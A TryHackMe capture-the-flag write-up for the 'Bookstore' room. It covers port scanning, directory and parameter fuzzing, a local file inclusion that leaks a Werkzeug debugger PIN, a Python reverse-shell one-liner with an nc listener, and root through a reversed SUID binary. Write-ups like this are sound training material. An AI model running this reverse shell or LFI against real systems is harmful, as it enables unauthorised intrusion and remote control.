Bookstore — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my Bookstore — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -A -T4 -v -p- <ip>

There’re 3 ports opened: 22(SSH), 80(Apache), and 5000(Werkzeug). Werkzeug is a python web’s api. Let’s first access the website at port 80:

website

I’ve checked the page source (Ctrl+U), but nothing valuable.

Now let’s access /books:

View source:

page source of /books

There’s a base32 encoded string. Decode it using https://www.dcode.fr/base-32-encoding:

decode

Then, decode the ascii and I found a youtube link:

decode

Access the youtube:

rabbit hole

Well looks like it’s a rabbit hole.

Next, access /login:

/login

Page source:

page source

So I need to exploit the debugger side. Access port 5000:

port 5000

Use gobuster to find hidden dirs on this port:

gobuster dir -u http://<ip>:5000 -w /path-to-wordlist

gobuster

Robots.txt:

robots.txt

Nothing here.

/console:

/console

Well, in order to access /console, I need the PIN. By looking back at the page source of login.html page, I know that theb is inside .bash_history file.

Access /api:

/api

Ok so now I know the parameter of the api. So I tried LFI to look for .bash_history but none successful. I even tried to downgrade the api version (v2 to v1) but still invulnerable:

LFI

So I think that there’s another parameter which I can use for LFI. I use WFUZZ to fuzz for the hidden parameter:

wfuzz -c -f bookstore.txt -u “http://<ip>:5000/api/v1/resources/books?FUZZ=.bash_history” -w /path-to-wordlist -t 100 2>/dev/null — hc 404

wfuzz

Ok so I’ve found the hidden parameter. Let’s use this parameter for LFI:

http://<ip>:5000/api/v1/resources/books?the-parameter=.bash_history

LFI

I’ve got the PIN! It’s time for /console:

/console

I’ve got into the console. I can run Python code here, so let’s spawn a reverse shell to my machine. First, start a listener on your machine:

nc –lvnp 4444

Then run this python code in the web’s console:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<ip> “,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)

After that, I’ve got the shell into the machine as sid:

shell

Get the user flag:

user flag

Next, I will find a way to priv escalation to root. First, try sudo –l to see if sid can run sudo:

sudo -l

Well, I haven’t known sid’s password, so I cannot run sudo now. Try with command SUID using find:

find / -perm -u=s 2>/dev/null

SUID

This command looks suspicious. Let’s inspect it:

Execute it:

So I need to find the correct number. First, transfer the try-harder script to your machine using scp:

scp try-harder user-name@<ip>:/home/username

Then, use ghidra to decompile the script:

ghidra

Ok, so if I input the correct number, I will have the bash shell as root (as –p flag will execute bash with SUID, and this command has SUID of root).

Decode the hex to text and I’ve got all the number needed:

Ok so here’s the formula:

formula

“^” means XOR. So a will be: 1573743953

Input this number and I’ve got the root shell! Read the root flag:

The end.

HAPPY HACKING